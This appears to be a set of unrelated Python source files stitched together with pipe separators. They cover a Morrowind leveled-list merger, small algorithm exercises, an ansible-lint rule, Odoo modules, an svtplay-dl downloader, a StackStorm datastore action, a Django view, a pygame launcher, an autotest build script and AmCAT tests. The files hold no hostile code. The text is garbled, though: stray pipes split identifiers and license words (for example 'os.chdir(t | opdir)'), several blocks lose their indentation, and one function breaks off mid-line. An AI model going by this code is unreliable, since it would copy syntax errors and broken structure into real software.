            # 16-byte record header; only the first 8 bytes (type + length)
            # are meaningful to us
            headerba = fh.read(16)
            if headerba is None or len(headerba) < 16:
                return None
            record = {}
            header = readHeader(headerba)
            record['type'] = header['type']
            record['length'] = header['length']
            record['subrecords'] = []
            # stash the filename here (a bit hacky, but useful)
            record['fullpath'] = filename
            remains = fh.read(header['length'])
            while len(remains) > 0:
                (subrecord, restofbytes) = readSubRecord(remains)
                record['subrecords'].append(subrecord)
                remains = restofbytes
            yield record
def oldGetRecords(filename, rectype):
    """Yield the records in *filename* whose type equals *rectype*."""
    for record in readRecords(filename):
        if record['type'] == rectype:
            yield record
def getRecords(filename, rectypes):
    """Collect records from *filename*, bucketed by type.

    :param filename: path to a TES3-format plugin file
    :param rectypes: sequence of record type tags to collect
    :return: list of lists, parallel to *rectypes*

    Improvement: the original re-scanned *rectypes* for every matching
    record (O(records * types)); a one-time tag -> bucket map makes each
    record a single dict lookup.
    """
    buckets = {rectype: [] for rectype in rectypes}
    for r in readRecords(filename):
        if r['type'] in buckets:
            buckets[r['type']].append(r)
    return [buckets[rectype] for rectype in rectypes]
def packStringSubRecord(lbl, strval):
    """Pack a labelled, NUL-terminated string subrecord."""
    payload = packString(strval) + bytes(1)  # trailing NUL byte
    return packString(lbl) + packLong(len(payload)) + payload
def packIntSubRecord(lbl, num, numsize=4):
    """Pack a labelled little-endian signed integer subrecord.

    *numsize* selects the width: 1, 2, 4 (default) or 8 bytes; any other
    width yields an empty payload.  The struct format strings are kept as
    literals per the original author's note that struct.pack failed when
    handed the format through a variable (observed on Python 3.5.2).
    """
    if numsize == 4:
        payload = pack('<l', num)
    elif numsize == 2:
        payload = pack('<h', num)
    elif numsize == 1:
        # endianness is moot for a single byte; '<' kept for consistency
        payload = pack('<b', num)
    elif numsize == 8:
        payload = pack('<q', num)
    else:
        payload = b''
    return packString(lbl) + packLong(numsize) + payload
def packLEV(rec):
    """Serialize a leveled-list record (LEVC creature list or LEVI item
    list) back into its binary on-disk form.

    Creature entries are named with CNAM subrecords, item entries with
    INAM; each entry id is followed by its level in a 2-byte INTV.
    """
    start_bs = b''
    id_bs = ''
    if rec['type'] == 'LEVC':
        start_bs += b'LEVC'
        id_bs = 'CNAM'
    else:
        start_bs += b'LEVI'
        id_bs = 'INAM'
    # eight zero bytes: record header flags area
    headerflags_bs = bytes(8)
    name_bs = packStringSubRecord('NAME', rec['name'])
    calcfrom_bs = packIntSubRecord('DATA', rec['calcfrom'])
    chance_bs = packIntSubRecord('NNAM', rec['chancenone'], 1)
    # entry count, then one (id, level) subrecord pair per entry
    subrec_bs = packIntSubRecord('INDX', len(rec['items']))
    for (lvl, lid) in rec['items']:
        subrec_bs += packStringSubRecord(id_bs, lid)
        subrec_bs += packIntSubRecord('INTV', lvl, 2)
    reclen = len(name_bs) + len(calcfrom_bs) + len(chance_bs) + len(subrec_bs)
    reclen_bs = packLong(reclen)
    return start_bs + reclen_bs + headerflags_bs + \
        name_bs + calcfrom_bs + chance_bs + subrec_bs
def packTES3(desc, numrecs, masters):
    """Build a complete TES3 file-header record.

    :param desc: description text (padded to 256 bytes)
    :param numrecs: number of records that will follow in the file
    :param masters: iterable of (master filename, size) pairs
    """
    start_bs = b'TES3'
    headerflags_bs = bytes(8)
    # HEDR payload is a fixed 300 bytes: version + type + author + desc + count
    hedr_bs = b'HEDR' + packLong(300)
    version_bs = pack('<f', 1.0)
    # .esp == 0, .esm == 1, .ess == 32
    # suprisingly, .omwaddon == 0, also -- figured it would have its own
    ftype_bs = bytes(4)
    author_bs = packPaddedString('omwllf, copyright 2017, jmelesky', 32)
    desc_bs = packPaddedString(desc, 256)
    numrecs_bs = packLong(numrecs)
    masters_bs = b''
    for (m, s) in masters:
        masters_bs += packStringSubRecord('MAST', m)
        masters_bs += packIntSubRecord('DATA', s, 8)
    reclen = len(hedr_bs) + len(version_bs) + len(ftype_bs) + len(author_bs) +\
        len(desc_bs) + len(numrecs_bs) + len(masters_bs)
    reclen_bs = packLong(reclen)
    return start_bs + reclen_bs + headerflags_bs + \
        hedr_bs + version_bs + ftype_bs + author_bs + \
        desc_bs + numrecs_bs + masters_bs
def ppSubRecord(sr):
    """Pretty-print one subrecord, decoding known string and number types."""
    if sr['type'] in ['NAME', 'INAM', 'CNAM']:
        print("    %s, length %d, value '%s'" % (sr['type'], sr['length'], parseString(sr['data'])))
    elif sr['type'] in ['DATA', 'NNAM', 'INDX', 'INTV']:
        print("    %s, length %d, value '%s'" % (sr['type'], sr['length'], parseNum(sr['data'])))
    else:
        # unknown payload type: show only the tag and size
        print("    %s, length %d" % (sr['type'], sr['length']))
def ppRecord(rec):
    """Pretty-print a record header followed by all of its subrecords."""
    print("%s, length %d" % (rec['type'], rec['length']))
    for sr in rec['subrecords']:
        ppSubRecord(sr)
def ppLEV(rec):
    """Pretty-print a parsed leveled list (creature or item) record."""
    if rec['type'] == 'LEVC':
        print("Creature list '%s' from '%s':" % (rec['name'], rec['file']))
    else:
        print("Item list '%s' from '%s':" % (rec['name'], rec['file']))
    print("flags: %d, chance of none: %d" % (rec['calcfrom'], rec['chancenone']))
    for (lvl, lid) in rec['items']:
        print("    %2d - %s" % (lvl, lid))
def ppTES3(rec):
    """Pretty-print a parsed TES3 file-header record and its master list."""
    print("TES3 record, type %d, version %f" % (rec['filetype'], rec['version']))
    print("author: %s" % rec['author'])
    print("description: %s" % rec['desc'])
    for (mfile, msize) in rec['masters']:
        print("  master %s, size %d" % (mfile, msize))
    print()
def mergeableLists(alllists):
    """Group leveled lists by name; return only names defined more than once.

    Lists that appear in multiple plugins are exactly the ones that need
    merging.
    """
    candidates = {}
    for levlist in alllists:
        candidates.setdefault(levlist['name'], []).append(levlist)
    return {name: lists for name, lists in candidates.items() if len(lists) > 1}
def mergeLists(lls):
# last one gets priority for list-level attributes
last = lls[-1]
newLev = { 'type': last['type'],
'name': last['name'],
'calcfrom': last['calcfrom'],
'chancenone': last['chancenone'] }
allItems = []
for l in lls:
allItems += l['items']
newLev['files'] = [ x['file'] for x in lls ]
newLev['file'] = ', '.join(newLev['files'])
# This ends up being a bit tricky, but it prevents us
# from overloading lists with the same stuff.
#
# This is needed, because the original leveled lists
# contain multiple entries for some creatures/items, and
# that gets reproduced in many plugins.
#
# If we just added and sorted, then the more plugins you
# have, the less often you'd see plugin content. This
# method prevents the core game content from overwhelming
# plugin contents.
allUniques = [ x for x in set(allItems) ]
allUniques.sort()
newList = []
for i in all |
#!/bin/python
import sys
def getSumOfAP(n, max):
    """Return the sum of all positive multiples of n strictly below max.

    Arithmetic-series formula: with k = (max - 1) // n terms, the sum is
    n * k * (k + 1) / 2.

    Fix: use floor division for the final halving.  The product is always
    even so the value is unchanged, but `/` would produce an inexact float
    under Python 3 for large inputs; `//` keeps exact integer arithmetic.
    """
    size = (max - 1) // n
    return (size * (n + size * n)) // 2
def getSumOfMultiples(n):
    """Sum of multiples of 3 or 5 below n, by inclusion-exclusion over 15."""
    threes = getSumOfAP(3, n)
    fives = getSumOfAP(5, n)
    overlap = getSumOfAP(15, n)
    return threes + fives - overlap
def main():
    """Read a case count, then for each case read n and print the sum of
    multiples of 3 or 5 below n.

    Fix: the original called getSumOfAP(n), which takes two arguments and
    would raise a TypeError on every case; the intended call is
    getSumOfMultiples(n).  (raw_input/xrange match the file's Python 2
    style.)
    """
    numInputs = int(raw_input().strip())
    for idx in xrange(numInputs):
        n = int(raw_input().strip())
        ans = getSumOfMultiples(n)
        print(ans)
if __name__ == '__main__':
main()
|
# Copyright (c) 2013-2014 Will Thames <will@thames.id.au>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING | BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION | OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ansiblelint import AnsibleLintRule
class MismatchedBracketRule(AnsibleLintRule):
    """Flag lines whose '{' and '}' counts differ, since unbalanced braces
    tend to make Jinja templating fail in confusing ways."""
    id = 'ANSIBLE0003'
    shortdesc = 'Mismatched { and }'
    description = 'If lines contain more { than } or vice ' + \
                  'versa then templating can fail nastily'
    tags = ['templating']

    def match(self, file, line):
        # a balanced line has exactly as many opening as closing braces
        opens = line.count("{")
        closes = line.count("}")
        return opens != closes
|
# -*- encoding: utf-8 -*-
################################################################################
# #
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU Affero General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU Affero General Public License for more details. #
# #
# You should have received a copy of the GNU Affero General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
################################################################################
from openerp import models, fields, api
from datetime import *
import time
class clv_tray(models.Model):
    """Extends clv_tray with a simple lifecycle (new / active / inactive /
    suspended) and timestamps recording each transition."""
    _inherit = 'clv_tray'

    # Timestamp of the most recent state change.
    date = fields.Datetime("Status change date", required=True, readonly=True,
                           default=lambda *a: datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
    # First activation/inactivation/suspension times; set once and kept.
    date_activation = fields.Datetime("Activation date", required=False, readonly=False)
    date_inactivation = fields.Datetime("Inactivation date", required=False, readonly=False)
    date_suspension = fields.Datetime("Suspension date", required=False, readonly=False)
    state = fields.Selection([('new','New'),
                              ('active','Active'),
                              ('inactive','Inactive'),
                              ('suspended','Suspended')
                              ], string='Status', default='new', readonly=True, required=True, help="")

    @api.one
    def button_new(self):
        # Reset the record to its initial state, stamping the change date.
        self.date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        self.state = 'new'

    @api.one
    def button_activate(self):
        self.date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        # only record the first activation time
        if not self.date_activation:
            self.date_activation = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        # NOTE(review): presumably forces distinct second-resolution
        # timestamps between consecutive clicks -- confirm it is needed
        time.sleep(1.0)
        self.state = 'active'

    @api.one
    def button_inactivate(self):
        self.date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        # only record the first inactivation time
        if not self.date_inactivation:
            self.date_inactivation = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        time.sleep(1.0)
        self.state = 'inactive'

    @api.one
    def button_suspend(self):
        self.date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        # only record the first suspension time
        if not self.date_suspension:
            self.date_suspension = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        time.sleep(1.0)
        self.state = 'suspended'
|
def init_actions_(service, args):
    """Return the dependency mapping between this service's actions.

    See ACTION_DEPS in this module for an example of the expected
    structure.  Both parameters are part of the interface but unused by
    this simple default.
    """
    # 'test' may only run once 'install' has completed
    return {'test': ['install']}
def test(job):
    """
    Tests parsing of a bp with/without default values
    """
    import sys
    # result strings recorded on the service model for the cockpit to read
    RESULT_OK = 'OK : %s'
    RESULT_FAILED = 'FAILED : %s'
    RESULT_ERROR = 'ERROR : %s %%s' % job.service.name
    model = job.service.model
    # assume success; overwritten below on any failure/error
    model.data.result = RESULT_OK % job.service.name
    test_repo_path = j.sal.fs.joinPaths(j.dirs.varDir, 'tmp', 'test_validate_model')
    sample_bp_path = j.sal.fs.joinPaths('/opt/code/github/jumpscale/jumpscale_core8/tests/samples/test_validate_delete_model_sample.yaml')
    try:
        # start from a clean repo directory
        if j.sal.fs.exists(test_repo_path):
            j.sal.fs.removeDirTree(test_repo_path)
        test_repo = j.atyourservice.repoCreate(test_repo_path, 'git@github.com:0-complexity/ays_automatic_cockpit_based_testing.git')
        bp_path = j.sal.fs.joinPaths(test_repo.path, 'blueprints', 'test_validate_delete_model_sample.yaml')
        j.sal.fs.copyFile(j.sal.fs.joinPaths(sample_bp_path), j.sal.fs.joinPaths(test_repo.path, 'blueprints'))
        test_repo.blueprintExecute(bp_path)
        # schedule and run an install on the sshkey!main service
        action = 'install'
        role = 'sshkey'
        instance = 'main'
        for service in test_repo.servicesFind(actor="%s.*" % role, name=instance):
            service.scheduleAction(action=action, period=None, log=True, force=False)
        run = test_repo.runCreate(profile=False, debug=False)
        run.execute()
        # destroying the repo must wipe on-disk state and in-memory models,
        # but must NOT delete the job history
        test_repo.destroy()
        if j.sal.fs.exists(j.sal.fs.joinPaths(test_repo.path, "actors")):
            model.data.result = RESULT_FAILED % ('Actors directory is not deleted')
        if j.sal.fs.exists(j.sal.fs.joinPaths(test_repo.path, "services")):
            model.data.result = RESULT_FAILED % ('Services directory is not deleted')
        if j.sal.fs.exists(j.sal.fs.joinPaths(test_repo.path, "recipes")):
            model.data.result = RESULT_FAILED % ('Recipes directory is not deleted')
        if test_repo.actors:
            model.data.result = RESULT_FAILED % ('Actors model is not removed')
        if test_repo.services:
            model.data.result = RESULT_FAILED % ('Services model is not removed')
        if not j.core.jobcontroller.db.runs.find(repo=test_repo.model.key):
            model.data.result = RESULT_FAILED % ('Jobs are deleted after repository destroy')
    except:
        model.data.result = RESULT_ERROR % str(sys.exc_info()[:2])
    finally:
        job.service.save()
|
#!/bin/python
def swap(findex, sindex, ar):
    """Exchange the elements of *ar* at the two given indices, in place."""
    held = ar[findex]
    ar[findex] = ar[sindex]
    ar[sindex] = held
def partition(ar, lo, hi):
    '''3 way djisktra partition method'''
    # NOTE(review): despite the docstring this is not a full 3-way
    # partition -- equal elements are counted in `eq` but `eq` is never
    # used in the result; looks vestigial, confirm before removing.
    start = lo
    # middle element becomes the pivot: swapped to the hi slot first
    pivotIndex = (lo+hi)//2
    # take the elemet @ hi as the pivot and swap it to pivotIndex position
    swap(pivotIndex, hi, ar)
    pivotIndex = hi
    pivot = ar[pivotIndex]
    eq = lo
    for index in xrange(lo, hi):
        if (ar[eq] == pivot):
            eq += 1
        # index < pivotIndex always holds here since index < hi == pivotIndex
        if (ar[index] < pivot and index < pivotIndex):
            swap(index, lo, ar)
            lo += 1
            eq +=1
    # move the pivot between the smaller and larger partitions
    swap(lo, pivotIndex, ar)
    return lo
def quickSort(ar):
    '''Iterative unstable in-place sort'''
    n = len(ar)
    hi = n-1
    lo = 0
    # explicit work list of (lo, hi) sub-ranges replacing recursion
    stack = [(lo, hi)]
    while stack:
        lo, hi = stack.pop()
        pivot = partition(ar, lo, hi)
        # NOTE(review): insert(0, ...) is O(n) per call and makes this a
        # FIFO; append() would be cheaper with the same final result.
        if lo<pivot-1:
            stack.insert(0, (lo, pivot-1))
        if pivot+1<hi:
            stack.insert(0, (pivot+1, hi))
def quickSortRec(ar, n, lo, hi):
    '''Recursive unstable in-place sort'''
    # recurse on each side of the pivot only while the sub-range has
    # more than one element
    pivot = partition(ar, lo, hi)
    # print lo, pivot, hi
    if lo<pivot-1 and lo != pivot:
        quickSortRec(ar, n, lo, pivot-1)
        # print ' '.join(ar)
    if pivot+1<hi and pivot != hi:
        quickSortRec(ar, n, pivot+1, hi)
        # print ' '.join(ar)
from __future__ import absolute_import
import re
import json
import copy
import os
from svtplay_dl.service import Service, OpenGraphThumbMixin
from svtplay_dl.utils.urllib import urlparse
from svtplay_dl.utils import filenamify
from svtplay_dl.fetcher.http import HTTP
from svtplay_dl.fetcher.hds import hdsparse
from svtplay_dl.fetcher.hls import HLS, hlsparse
from svtplay_dl.error import ServiceError
class Vg(Service, OpenGraphThumbMixin):
    """svtplay-dl service for vg.no / vgtv.no video pages."""
    supported_domains = ['vg.no', 'vgtv.no']

    def get(self, options):
        """Yield downloadable stream objects (HDS/HLS/MP4) for the page,
        or ServiceError when the video cannot be resolved."""
        data = self.get_urldata()
        # video id is normally in a data-videoid attribute; fall back to
        # the /video/<id>/ pattern in the URL fragment
        match = re.search(r'data-videoid="([^"]+)"', data)
        if not match:
            parse = urlparse(self.url)
            match = re.search(r'video/(\d+)/', parse.fragment)
            if not match:
                yield ServiceError("Can't find video file for: %s" % self.url)
                return
        videoid = match.group(1)
        # asset metadata (title + stream URLs) from the SVP API
        data = self.http.request("get", "http://svp.vg.no/svp/api/v1/vgtv/assets/%s?appName=vgtv-website" % videoid).text
        jsondata = json.loads(data)
        if options.output_auto:
            # derive the output filename from the asset title
            directory = os.path.dirname(options.output)
            title = "%s" % jsondata["title"]
            title = filenamify(title)
            if len(directory):
                options.output = os.path.join(directory, title)
            else:
                options.output = title
        if self.exclude(options):
            yield ServiceError("Excluding video")
            return
        # emit one fetcher per advertised protocol
        if "hds" in jsondata["streamUrls"]:
            streams = hdsparse(copy.copy(options), self.http.request("get", jsondata["streamUrls"]["hds"], params={"hdcore": "3.7.0"}).text, jsondata["streamUrls"]["hds"])
            if streams:
                for n in list(streams.keys()):
                    yield streams[n]
        if "hls" in jsondata["streamUrls"]:
            streams = hlsparse(jsondata["streamUrls"]["hls"], self.http.request("get", jsondata["streamUrls"]["hls"]).text)
            for n in list(streams.keys()):
                yield HLS(copy.copy(options), streams[n], n)
        if "mp4" in jsondata["streamUrls"]:
            yield HTTP(copy.copy(options), jsondata["streamUrls"]["mp4"])
|
from st2actions.runners.pythonrunner import Action
from st2client.client import Client
# Keep Compatability with 0.8 and 0.11 until st2build is upgraded
try:
from st2client.models.datastore import KeyValuePair
except ImportError:
from st2client.models.keyvalue import KeyValuePair
class KVPAction(Action):
    """StackStorm action wrapping the st2 datastore key/value API."""

    def run(self, key, action, st2host='localhost', value=""):
        """Perform *action* ('get', 'create', 'update', 'delete') on *key*.

        :param st2host: accepted for interface compatibility; not passed to
            the Client constructed here
        """
        try:
            client = Client()
        except Exception as e:
            # NOTE(review): returns the exception object instead of raising,
            # so callers receive it as a "result" -- confirm this is intended
            return e
        if action == 'get':
            kvp = client.keys.get_by_name(key)
            if not kvp:
                raise Exception('Key error with %s.' % key)
            return kvp.value
        else:
            # reuse the existing pair when present, otherwise build a new one
            instance = client.keys.get_by_name(key) or KeyValuePair()
            instance.id = key
            instance.name = key
            instance.value = value
            kvp = client.keys.update(instance) if action in ['create', 'update'] else None
            if action == 'delete':
                # NOTE(review): no delete call is ever issued, so 'delete'
                # returns None without touching the datastore -- verify
                return kvp
            else:
                return kvp.serialize()
|
from django.shortcuts import render, redirect, get_object_or_404
from django.urls import reverse
from mainmodels.models import Course, FeaturedCourse
# Create your views here.
def index(req):
    """Render the landing page with the ten most-taken courses and up to
    ten featured courses, both fetched via raw SQL."""
    # rank courses by number of transactions (takers), highest first
    mostPopularCourses = Course.objects.raw('SELECT * FROM mainmodels_course as main_course JOIN (SELECT main_tran.courseID, COUNT(main_tran.takerID) as taker_amount FROM mainmodels_transaction as main_tran GROUP BY main_tran.courseID ORDER BY taker_amount DESC) as main_count ON main_course.courseID = main_count.courseID LIMIT 10;')
    featureCourses = FeaturedCourse.objects.raw('SELECT * FROM mainmodels_featuredcourse as main_feat JOIN mainmodels_course as main_course ON main_feat.course_id = main_course.courseID LIMIT 10;')
    return render(req, 'index/main.html', {'pageTitle': 'Coursing Field', 'mostPopularCourses': mostPopularCourses, 'featureCourses': featureCourses})
|
#!/usr/bin/python
import pygame
import math
import random
import sys
import PixelPerfect
from pygame.locals import *
from water import Water
from menu import Menu
from game import Game
from highscores import Highscores
from options import Options
import util
from locals import *
import health
import cloud
import mine
import steamboat
import pirateboat
import shark
import seagull
def init():
    """Load the per-module sprite/sound resources once at startup."""
    health.init()
    steamboat.init()
    shark.init()
    pirateboat.init()
    cloud.init()
    mine.init()
    seagull.init()
def main():
    """Entry point: parse CLI flags, set up pygame, then loop over the
    main menu until the player quits.

    Flags: -np no particles, -na no alpha, -nm no music, -ns no sound,
    -f fullscreen.
    """
    global SCREEN_FULLSCREEN
    pygame.init()
    util.load_config()
    if len(sys.argv) > 1:
        for arg in sys.argv:
            if arg == "-np":
                Variables.particles = False
            elif arg == "-na":
                Variables.alpha = False
            elif arg == "-nm":
                Variables.music = False
            elif arg == "-ns":
                Variables.sound = False
            elif arg == "-f":
                SCREEN_FULLSCREEN = True
    scr_options = 0
    if SCREEN_FULLSCREEN: scr_options += FULLSCREEN
    screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT),scr_options ,32)
    pygame.display.set_icon(util.load_image("kuvake"))
    pygame.display.set_caption("Trip on the Funny Boat")
    init()
    joy = None
    if pygame.joystick.get_count() > 0:
        joy = pygame.joystick.Joystick(0)
        joy.init()
    try:
        util.load_music("JDruid-Trip_on_the_Funny_Boat")
        if Variables.music:
            pygame.mixer.music.play(-1)
    except:
        # It's not a critical problem if there's no music
        pass
    # NOTE(review): 1000 / FPS is a float under Python 3; set_timer needs
    # an int there -- fine on the Python 2 this was written for
    pygame.time.set_timer(NEXTFRAME, 1000 / FPS) # 30 fps
    Water.global_water = Water()
    main_selection = 0
    while True:
        main_selection = Menu(screen, ("New Game", "High Scores", "Options", "Quit"), main_selection).run()
        if main_selection == 0:
            # New Game
            selection = Menu(screen, ("Story Mode", "Endless Mode")).run()
            if selection == 0:
                # Story
                score = Game(screen).run()
                Highscores(screen, score).run()
            elif selection == 1:
                # Endless
                score = Game(screen, True).run()
                Highscores(screen, score, True).run()
        elif main_selection == 1:
            # High Scores
            selection = 0
            while True:
                selection = Menu(screen, ("Story Mode", "Endless Mode", "Endless Online"), selection).run()
                if selection == 0:
                    # Story
                    Highscores(screen).run()
                elif selection == 1:
                    # Endless
                    Highscores(screen, endless = True).run()
                elif selection == 2:
                    # Online
                    Highscores(screen, endless = True, online = True).run()
                else:
                    break
        elif main_selection == 2:
            # Options
            selection = Options(screen).run()
        else: #if main_selection == 3:
            # Quit
            return
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright | (C) 2015 ADHOC SA (http://www.adhoc.com.ar)
# A | ll Rights Reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# Odoo/OpenERP module manifest for the Portal Partner Fix addon.
{
    'name': 'Portal Partner Fix',
    'version': '8.0.1.0.0',
    'category': '',
    'sequence': 14,
    'summary': '',
    'description': """
Portal Partner Fix
==================
Let user read his commercial partner
""",
    'author': 'ADHOC SA',
    'website': 'www.adhoc.com.ar',
    'images': [
    ],
    'depends': [
        'portal',
    ],
    'data': [
        'security/portal_security.xml',
    ],
    'demo': [
    ],
    'test': [
    ],
    'installable': True,
    'auto_install': False,
    'application': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4: |
#!/usr/bin/python
import os
from autotest.client import utils
version = 1
def setup(tarball, topdir):
    """Unpack the grubby tarball into <topdir>/src, build and install it.

    Invoked by autotest's utils.update_version() the first time this
    `version` is seen for the extracted sources.
    """
    srcdir = os.path.join(topdir, 'src')
    utils.extract_tarball_to_dir(tarball, srcdir)
    os.chdir(srcdir)
    utils.make()
    # NOTE(review): MAKEOPTS is set after the build but before install --
    # presumably only the install step needs mandir; confirm this ordering
    # is intentional.
    os.environ['MAKEOPTS'] = 'mandir=/usr/share/man'
    utils.make('install')
    os.chdir(topdir)
os.chdir(t | opdir)
pwd = os.getcwd()
tarball = os.path.join(pwd, 'grubby-8.11-autotest.tar.bz2')
utils.update_version(os.path.join(pwd, 'src'),
False, version, setup, tarball, pwd)
|
###########################################################################
# (C) Vrije Universiteit, Amsterdam (the Netherlands) #
# #
# This file is part of AmCAT - The Amsterdam Content Analysis Toolkit #
# #
# AmCAT is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Affero General Public License as published by the #
# Free Software Foundation, either version 3 of the License, or (at your #
# option) any later version. #
# #
# AmCAT is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public #
# License for more details. #
# #
# You should have received a copy of the GNU Affero General Public #
# License along with AmCAT. If not, see <http://www.gnu.org/licenses/>. #
###########################################################################
import json
from amcat.models import CodingRule, CodingSchemaField, Code
from amcat.models.coding.codingruletoolkit import schemarules_valid, parse, to_json, EQUALS, \
clean_tree, NOT, OR
from amcat.models.coding.codingschema import ValidationError
from amcat.tools import amcattest
class TestCodingRuleToolkit(amcattest.AmCATTestCase):
    """Unit tests for the codingruletoolkit parse / serialise / clean helpers."""
    def condition(self, s, c):
        # Build (but do not save) a CodingRule with condition `c` on schema `s`.
        return CodingRule(codingschema=s, condition=c)
    def test_schemafield_valid(self):
        """schemarules_valid() is True iff every saved rule on the schema parses."""
        schema_with_fields = amcattest.create_test_schema_with_fields()
        schema = schema_with_fields[0]
        self.assertTrue(schemarules_valid(schema))
        self.condition(schema, "()").save()
        self.assertTrue(schemarules_valid(schema))
        # Field 3 does not exist on this schema, so this rule is invalid.
        self.condition(schema, "(3==2)").save()
        self.assertFalse(schemarules_valid(schema))
        CodingRule.objects.all().delete()
        # Test multiple (correct) rules
        self.condition(schema, "()").save()
        self.condition(schema, "()").save()
        self.condition(schema, "()").save()
        self.assertTrue(schemarules_valid(schema))
        self.condition(schema, "(3==2)").save()
        self.assertFalse(schemarules_valid(schema))
    def test_to_json(self):
        """to_json() serialises a parse tree; serialise=False yields the raw dict."""
        import functools
        o1, o2 = amcattest.create_test_code(), amcattest.create_test_code()
        schema_with_fields = amcattest.create_test_schema_with_fields()
        code_field = schema_with_fields[4]
        c = functools.partial(self.condition, schema_with_fields[0])
        tree = to_json(parse(c("{}=={}".format(code_field.id, o1.id))))
        self.assertEquals(json.loads(tree), {"type": EQUALS, "values": [
            {"type": "codingschemafield", "id": code_field.id},
            {"type": "code", "id": o1.id}
        ]})
        # serialise=False must round-trip through json.dumps to the same string.
        tree = parse(c("{}=={}".format(code_field.id, o1.id)))
        self.assertEquals(json.dumps(to_json(tree, serialise=False)), to_json(tree))
    def test_clean_tree(self):
        """clean_tree() raises when a referenced code is not in the schema's codebook."""
        import functools
        o1, o2 = amcattest.create_test_code(), amcattest.create_test_code()
        codebook, codebook_codes = amcattest.create_test_codebook_with_codes()
        schema_with_fields = amcattest.create_test_schema_with_fields(codebook=codebook)
        schema = schema_with_fields[0]
        code_field = schema_with_fields[4]
        c = functools.partial(self.condition, schema)
        # o1 is not part of `codebook`, so cleaning must fail.
        tree = parse(c("{code_field.id}=={o1.id}".format(**locals())))
        self.assertRaises(ValidationError, clean_tree, schema, tree)
        tree = parse(c("{code_field.id}=={code.id}".format(code_field=code_field, code=codebook.codes[0])))
        self.assertEquals(clean_tree(schema, tree), None)
        # The same tree is invalid against an unrelated schema.
        self.assertRaises(ValidationError, clean_tree, amcattest.create_test_schema_with_fields()[0], tree)
    def test_parse(self):
        """parse() validates syntax, field/code existence and operand types."""
        import functools
        o1, o2 = amcattest.create_test_code(), amcattest.create_test_code()
        schema_with_fields = amcattest.create_test_schema_with_fields()
        schema = schema_with_fields[0]
        codebook = schema_with_fields[1]
        text_field = schema_with_fields[2]
        number_field = schema_with_fields[3]
        code_field = schema_with_fields[4]
        c = functools.partial(self.condition, schema)
        # Empty conditions should return None
        self.assertEquals(parse(c("")), None)
        self.assertEquals(parse(c("()")), None)
        # Recursion should be checked for
        cr = CodingRule.objects.create(codingschema=schema, label="foo", condition="()")
        cr.condition = str(cr.id)
        self.assertRaises(SyntaxError, parse, cr)
        # Nonexisting fields should raise an error
        cr.condition = "0==2"
        self.assertRaises(CodingSchemaField.DoesNotExist, parse, cr)
        cr.condition = "{}==0".format(code_field.id)
        self.assertRaises(Code.DoesNotExist, parse, cr)
        cr.condition = "0"
        self.assertRaises(CodingRule.DoesNotExist, parse, cr)
        cr.condition = "{}=={}".format(code_field.id, o1.id)
        self.assertTrue(parse(cr) is not None)
        # Wrong inputs for fields should raise an error
        for inp in ("'a'", "0.2", "u'a'"):
            cr.condition = "{}=={}".format(number_field.id, inp)
            self.assertRaises(SyntaxError, parse, cr)
        for inp in ("'a'", "0.2", "u'a'", repr(str(o1.id))):
            cr.condition = "{}=={}".format(code_field.id, inp)
            self.assertRaises(SyntaxError, parse, cr)
        for inp in ("'a'", "0.2", "2"):
            cr.condition = "{}=={}".format(text_field.id, inp)
            self.assertRaises(SyntaxError, parse, cr)
        # "Good" inputs should not yield an error
        for field, inp in ((number_field, 1), (text_field, "u'a'"), (code_field, o1.id)):
            cr.condition = "{}=={}".format(field.id, inp)
            self.assertTrue(parse(cr) is not None)
        # Should accept Python-syntax (comments, etc)
        cr.condition = """{}==(
            # This should be a comment)
            {})""".format(text_field.id, "u'a'")
        self.assertTrue(parse(cr) is not None)
        ## Testing output
        tree = parse(c("not {}".format(cr.id)))
        self.assertEquals(tree["type"], NOT)
